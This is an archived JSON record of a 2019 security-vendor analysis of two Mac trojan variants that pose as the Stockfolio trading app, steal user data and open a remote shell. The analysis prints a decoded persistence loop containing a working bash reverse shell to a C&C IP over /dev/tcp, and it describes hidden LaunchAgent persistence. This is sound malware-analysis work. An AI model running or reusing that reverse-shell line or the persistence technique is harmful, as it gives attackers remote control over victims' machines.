{
	"id": "73e25fa3-89c4-4196-9a32-5808ba8ad1c1",
	"created_at": "2026-04-06T00:11:18.126039Z",
	"updated_at": "2026-04-10T13:13:09.375257Z",
	"deleted_at": null,
	"sha1_hash": "4ab70b673c1d9a2ad163734612da866db96ab46b",
	"title": "Mac Malware, Spoofs App, Steals User Information",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 83851,
	"plain_text": "Mac Malware, Spoofs App, Steals User Information\r\nBy: Luis Magisa Sep 20, 2019 Read time: 5 min (1339 words)\r\nPublished: 2019-09-20 · Archived: 2026-04-05 17:13:04 UTC\r\nUnlike in the pre-internet era, when trading in the stock or commodities market involved a phone call to a broker — a move which often meant additional fees for would-be traders — the rise of trading apps placed the ability to trade in the hands of ordinary users. However, their popularity has led to their abuse by cybercriminals who create fake trading apps as lures for unsuspecting victims in order to steal their personal data. We recently found and analyzed an example of such an app: a malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.\r\nWe found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to decrypt its encrypted code, while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism.\r\nSample 1: Trojan.MacOS.GMERA.A\r\nWe found the first sample (detected as Trojan.MacOS.GMERA.A) while checking suspicious shell scripts that were flagged by our machine learning system. At first glance, it was challenging to directly identify its malicious behavior because the shell script references other files such as AppCode, .pass and .app. To verify that the behavior was indeed malicious, we sourced the parent file using both our infrastructure and the aggregate website VirusTotal (which had the sample but lacked detections from other major security vendors at the time of writing).\r\nFigure 1. The suspicious shell script which was flagged by our system\r\nThe initial sample we analyzed was a zip archive file (detected as Trojan.MacOS.GMERA.A) that contained an app bundle (Stockfoli.app) and a hidden encrypted file (.app). 
The fake app presents itself as legitimate to trick users, but we found that it contained several malicious components.\r\nFigure 2. Content of the zip file. Note that the app bundle is missing the “o” at the end, whereas the legitimate app is called Stockfolio.\r\nThe zip file and its contents\r\nThe first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.\r\nComparing it to the Resources directory of the current version (1.5) found on the Stockfolio website revealed a number of differences, as shown in the figure below.\r\nFigure 3. Comparison of the app bundle folder structure between the malware variant (top) and the legitimate app (version 1.5, bottom).\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 1 of 5\n\nTechnical Analysis\r\nWhen the app is executed, an actual trading app interface will appear on-screen. However, unbeknownst to the user, the malware variant is already performing its malicious routines in the background.\r\nFigure 4. Interface displayed when the malware app bundle is executed\r\nThe main Mach-O executable will launch the following bundled shell scripts in the Resources directory:\r\nplugin\r\nstock\r\nThe plugin and stock shell scripts\r\nThe plugin shell script collects the following information from the infected system:\r\nusername\r\nIP address\r\napps in /Applications\r\nfiles in ~/Documents\r\nfiles in ~/Desktop\r\nOS installation date\r\nfile system disk space usage\r\ngraphic/display information\r\nwireless network information\r\nscreenshots\r\nIt then base64-encodes the collected information and saves it in a hidden file: /tmp/.info. 
It then uploads the file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and machine serial number as identifiers.\r\nIf the URL returns a successful response, the script writes that response to another hidden file, ~/Library/Containers/.pass.\r\nFigure 5. The “plugin” script\r\nThe stock shell script will copy Stockfoli.app/Contents/Resources/appcode to /private/var/tmp/appcode. It then locates the .app file, which is the hidden file in the zip bundle that comes with Stockfoli.app.\r\nFigure 6. The “stock” script\r\nIt decodes the b64-encoded .app file, executes it, then drops the following:\r\nFile Details\r\n/tmp/.hostname: gmzera54l5qpa6lm.onion\r\n/tmp/.privatkey: RSA private key\r\nIt will delete the .app file, then check if the file ~/Library/Containers/.pass exists. Using the contents of the ‘.pass’ file as the key, the malware variant will decrypt /private/var/tmp/appcode, which is encrypted using AES-256-CBC. It then saves the decrypted file to /tmp/appcode. Finally, it will execute the appcode. If it fails to do so, it will delete the /tmp/appcode file and ~/Library/Containers/.pass. Note that in the sample we analyzed, the decryption routine failed since the sample was not able to create ~/Library/Containers/.pass.\r\nFigure 7. Comparison of the code-signing information of the malicious app (top) and the legitimate Stockfolio app (bottom)\r\nWe suspect the file appcode is a malware file that contains additional routines. However, at the time of writing, we were unable to decrypt this file since the upload URL hxxps://appstockfolio.com/panel/upload[.]php was inaccessible (according to VirusTotal, the domain was active from January to February 2019). 
Furthermore, we suspect that the full malware routine uses the Tor network due to the presence of the unused address gmzera54l5qpa6lm[.]onion.\r\nSample 2: Trojan.MacOS.GMERA.B\r\nUsing the digital certificate of the first sample, we were able to find a second variant (detected as Trojan.MacOS.GMERA.B) that was uploaded to VirusTotal in June 2019. Like the first variant, it contains an embedded copy of Stockfolio.app version 1.4.13 with the malware author’s digital certificate. When executed, it launches the app in a similar manner to disguise its malicious intent.\r\nFigure 8. The bundle structure of Trojan.MacOS.GMERA.B\r\nOnce opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will launch the shell script run.sh.\r\nThe script run.sh collects the username and IP address of the infected machine via the following commands:\r\nusername = 'whoami'\r\nip address = 'curl -s ipecho.net/plain'\r\nIt connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:\r\nhxxp://owpqkszz[.]info/link.php?{username}\u0026{ip address}\r\nAs part of its routine, the malware also drops the following files:\r\nFile Details\r\n/private/tmp/.com.apple.upd.plist: Copy of ~/Library/LaunchAgents/.com.apple.upd.plist\r\n~/Library/LaunchAgents/.com.apple.upd.plist: Persistence mechanism\r\n/tmp/loglog: Malware execution logs\r\nIt then creates a simple reverse shell to the C\u0026C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands.\r\nFigure 9. 
Content of the run.sh shell script\r\nOne of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist\r\nFigure 10. Hidden plist file used for persistence\r\nAfter we decoded the b64-encoded arguments for the plist file, we found the following code:\r\nwhile :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i \u003e/dev/tcp/193.37.212.176/25733 0\u003e\u00261'; done\r\nThis code, run by the launch agent, repeatedly re-creates the reverse shell mentioned earlier, once every 10,000 seconds. The simple reverse shell created was observed to use the ports 25733-25736.\r\nConclusion\r\nGiven the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.\r\nIn the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if they come from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize the chances of downloading a malicious one. 
We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app's developers was revoked in July of this year.\r\nTrend Micro solutions\r\nEnd users can benefit from security solutions such as Trend Micro Home Security for Mac products, which provide comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites products with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.\r\nIndicators of Compromise (IoCs)\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/"
	],
	"report_names": [
		"mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website"
	],
	"threat_actors": [],
	"ts_created_at": 1775434278,
	"ts_updated_at": 1775826789,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.pdf",
		"text": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.txt",
		"img": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.jpg"
	}
}